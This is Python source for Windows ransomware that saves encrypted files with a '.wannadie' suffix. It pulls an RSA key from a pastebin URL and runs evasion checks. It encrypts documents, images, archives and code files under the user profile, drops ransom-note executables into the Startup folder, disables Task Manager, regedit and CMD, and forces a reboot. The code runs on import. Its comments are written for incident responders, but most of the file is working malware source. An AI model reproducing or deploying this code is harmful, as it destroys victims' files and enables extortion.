from modules import rsa,learn_key
from modules.bypass import anti_debugger,anti_sandbox,anti_vm
from ctypes import *
import os,time,win32api,sys,wget,shutil
# Module-level setup: fetch the RSA public key from a remote paste before any
# other work.  Any exception from the fetch (network failure, parse error in
# learn_key.public_key) is swallowed by the bare `except:` and the process exits
# with status 0, so the sample is silent when the key server is unreachable.
# For responders, this outbound request to pastebin.com precedes all file
# activity and is the earliest network indicator the sample produces.
try:
    PUBLIC_KEY = learn_key.public_key('https://pastebin.com/raw/FrNX6xHE')
except:
    sys.exit(0)
def anti_disassembly():
    """Bind a handful of unused junk string locals and return None.

    Despite the name, this function has no effect on the program: nothing
    reads these locals and no anti-analysis technique is applied.  It is
    presumably intended as filler to pad the compiled artefact.
    """
    a = 'adsadssadasdsgfaad'
    ab = 'adsadssadasdsasdad'
    ac = 'adsadssadasdsgfad'
    ad = 'adsadssadasadfdsad'
    av = 'adsadssadasdsasdad'
    abx = 'adsadssadasdsagad'
    acx = 'adsadssaadsadasdsad'
    ada = 'adsadssadasdagsad'
    aas = 'adsadsfssadasdsad'
    ae = 'adsadsgsadasdsad'
    ar = 'adfdfsadssadasdsad'
def download_ransom_request():
    """Drop two executables into the current user's Startup folder.

    Builds the per-user Start Menu ``Startup`` path from the ``username``
    environment variable, downloads ``ransom_request.exe`` there via ``wget``,
    copies it to the user's Desktop, then downloads ``time_script.exe`` into the
    same Startup folder.  In the listing as given the download source is the
    bare hostname ``'mediafire.com'`` with no scheme or path, so the URL is a
    placeholder and the calls are not expected to succeed as written.

    Every exception is swallowed by the bare ``except:`` so failures are never
    reported.  For defenders, file creation under
    ``...\\Start Menu\\Programs\\Startup\\`` by a Python/wget process is the
    observable artefact of this routine.
    """
    try:
        dir_startup = 'C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'.format(os.getenv('username'))
        # Script that will show the ransom request
        wget.download('mediafire.com',out=dir_startup+'ransom_request.exe')
        shutil.copy(dir_startup+'ransom_request.exe','C:\\Users\\{}\\Desktop\\ransom_request.exe'.format(os.getenv('username')))
        # Script that counts the 4 days to delete all files
        wget.download('mediafire.com',out=dir_startup+'time_script.exe')
    except:
        pass
def disable_all():
    """Set three HKCU policy values via ``reg add`` and force a reboot.

    Writes ``DisableRegistryTools``, ``DisableTaskMgr`` and ``DisableCMD`` as
    ``REG_DWORD`` 1 under
    ``HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System``
    through ``os.system``, then issues ``shutdown /r /f /t 3``.  If any of the
    ``os.system`` calls raises, the ``except`` branch still issues the same
    forced-reboot command, so the reboot happens on every path.

    Because everything goes through ``os.system``, each command is visible in
    process-creation / command-line logging; the three policy values are the
    registry indicators of this routine and are reversible by deleting them
    (they live in the user hive, so no elevation is involved).
    """
    try:
        os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
        os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
        os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
        os.system('shutdown /r /f /t 3')
    except:
        # Same forced reboot even when a reg add failed.
        os.system('shutdown /r /f /t 3')
def main():
    """Entry point: run the environment checks, encrypt the profile, persist.

    Sequence as written:

    1. ``anti_disassembly()`` (a no-op, see above).
    2. Three environment checks (sandbox, debugger, VM).  Each only prints a
       message when its ``check()`` does not return ``True``; execution
       continues either way, so the checks are informational, not gating.
       Note the VM branch prints ``'debugger found'`` (copy/paste of the
       previous message).  The ``print`` statements are Python 2 syntax.
    3. Enumerate ``C:\\Users\\<username>`` via ``rsa.files2crypt``; for each
       path that does not already end in ``.wannadie`` and whose
       ``os.path.splitext`` suffix is in ``valid_extension``, call
       ``rsa.encryptar`` with ``PUBLIC_KEY``.  Any exception per file is
       swallowed, so partial failures are invisible.
    4. Write ``delete_ransom.bat`` into the user's Startup folder containing a
       ``del /Q /S /F`` for the ``.exe`` form of this script's own path.  The
       local ``filename`` is computed but never used.
    5. Drop the ransom-note executables and apply the policy/reboot routine.

    For responders: the ``.wannadie`` suffix check and the ``delete_ransom.bat``
    file in ``Startup`` are the file-system indicators this function leaves.
    """
    anti_disassembly()
    if anti_sandbox.check(0,0,1,0,1,1) == True:
        pass
    else:
        print 'sandbox found'
    if anti_debugger.check() == True:
        pass
    else:
        print 'debugger found'
    if anti_vm.check() == True:
        pass
    else:
        print 'debugger found'
    username = os.getenv('username')
    path2crypt = 'C:\\Users\\' + username
    valid_extension = [".pl",".7z",".rar",".m4a",".wma",".avi",".wmv",".d3dbsp",".sc2save",".sie",".sum",".bkp",".flv",".js",".raw",".jpeg",".tar",".zip",".tar.gz",".cmd",".key",".DOT",".docm",".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".bmp"]
    enc_files = rsa.files2crypt(path2crypt)
    for file_pnt in enc_files:
        # Already-processed files carry the .wannadie suffix and are skipped.
        if os.path.basename(file_pnt).endswith(".wannadie"):
            pass
        else:
            extension = os.path.splitext(file_pnt)[1]
            if extension in valid_extension:
                try:
                    rsa.encryptar(str(file_pnt), PUBLIC_KEY)
                except:
                    pass
    # Self-removal stub dropped into Startup; targets <this script path>.exe.
    with open('C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\delete_ransom.bat'.format(os.getenv('username')),'w') as in_file:
        file_path = os.path.splitext(os.path.abspath(__file__))
        filename = file_path[0].split('.')[0]  # unused
        in_file.write('del /Q /S /F {}'.format(str(file_path[0])+'.exe'))
    download_ransom_request()
    disable_all()
# Unconditional call at module level: there is no `if __name__ == '__main__':`
# guard, so merely importing this module runs the whole routine.
main()